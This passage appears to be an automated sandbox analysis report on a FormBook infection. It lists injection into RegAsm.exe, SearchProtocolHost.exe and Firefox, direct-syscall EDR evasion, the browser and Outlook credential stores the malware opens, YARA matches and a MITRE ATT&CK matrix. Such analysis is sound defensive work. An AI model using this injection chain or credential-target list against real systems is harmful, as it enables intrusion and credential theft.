                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF3749 mov eax, dword ptr fs:[00000030h]4_2_02CF3749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5674D mov esi, dword ptr fs:[00000030h]4_2_02C5674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5674D mov eax, dword ptr fs:[00000030h]4_2_02C5674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5674D mov eax, dword ptr fs:[00000030h]4_2_02C5674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C20750 mov eax, dword ptr fs:[00000030h]4_2_02C20750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62750 mov eax, dword ptr fs:[00000030h]4_2_02C62750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C62750 mov eax, dword ptr fs:[00000030h]4_2_02C62750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA4755 mov eax, dword ptr fs:[00000030h]4_2_02CA4755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B765 mov eax, dword ptr fs:[00000030h]4_2_02C1B765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B765 mov eax, dword ptr fs:[00000030h]4_2_02C1B765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B765 mov eax, dword ptr fs:[00000030h]4_2_02C1B765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1B765 mov eax, dword ptr fs:[00000030h]4_2_02C1B765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C28770 mov eax, dword ptr fs:[00000030h]4_2_02C28770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h]4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C25702 mov eax, dword ptr fs:[00000030h]4_2_02C25702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C25702 mov eax, dword ptr fs:[00000030h]4_2_02C25702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C27703 mov eax, dword ptr fs:[00000030h]4_2_02C27703
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5C700 mov eax, dword ptr fs:[00000030h]4_2_02C5C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C20710 mov eax, dword ptr fs:[00000030h]4_2_02C20710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C50710 mov eax, dword ptr fs:[00000030h]4_2_02C50710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5F71F mov eax, dword ptr fs:[00000030h]4_2_02C5F71F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5F71F mov eax, dword ptr fs:[00000030h]4_2_02C5F71F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C23720 mov eax, dword ptr fs:[00000030h]4_2_02C23720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3F720 mov eax, dword ptr fs:[00000030h]4_2_02C3F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3F720 mov eax, dword ptr fs:[00000030h]4_2_02C3F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3F720 mov eax, dword ptr fs:[00000030h]4_2_02C3F720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF72E mov eax, dword ptr fs:[00000030h]4_2_02CDF72E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5C720 mov eax, dword ptr fs:[00000030h]4_2_02C5C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5C720 mov eax, dword ptr fs:[00000030h]4_2_02C5C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE972B mov eax, dword ptr fs:[00000030h]4_2_02CE972B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19730 mov eax, dword ptr fs:[00000030h]4_2_02C19730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19730 mov eax, dword ptr fs:[00000030h]4_2_02C19730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C55734 mov eax, dword ptr fs:[00000030h]4_2_02C55734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB73C mov eax, dword ptr fs:[00000030h]4_2_02CFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB73C mov eax, dword ptr fs:[00000030h]4_2_02CFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB73C mov eax, dword ptr fs:[00000030h]4_2_02CFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB73C mov eax, dword ptr fs:[00000030h]4_2_02CFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2973A mov eax, dword ptr fs:[00000030h]4_2_02C2973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2973A mov eax, dword ptr fs:[00000030h]4_2_02C2973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5273C mov eax, dword ptr fs:[00000030h]4_2_02C5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5273C mov ecx, dword ptr fs:[00000030h]4_2_02C5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5273C mov eax, dword ptr fs:[00000030h]4_2_02C5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C9C730 mov eax, dword ptr fs:[00000030h]4_2_02C9C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF54DB mov eax, dword ptr fs:[00000030h]4_2_02CF54DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C204E5 mov ecx, dword ptr fs:[00000030h]4_2_02C204E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CC94E0 mov eax, dword ptr fs:[00000030h]4_2_02CC94E0
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\System32\wscript.exeFile created: p_Cm7afCdw.exe.0.drJump to dropped file
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtUnmapViewOfSection: Direct from: 0x77762D3CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread register set: target process: 8052Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread APC queued: target process: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BC8008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeQueries volume information: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts2
                Exploitation for Client Execution                		221
                Scripting                		611
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook611
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items5
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
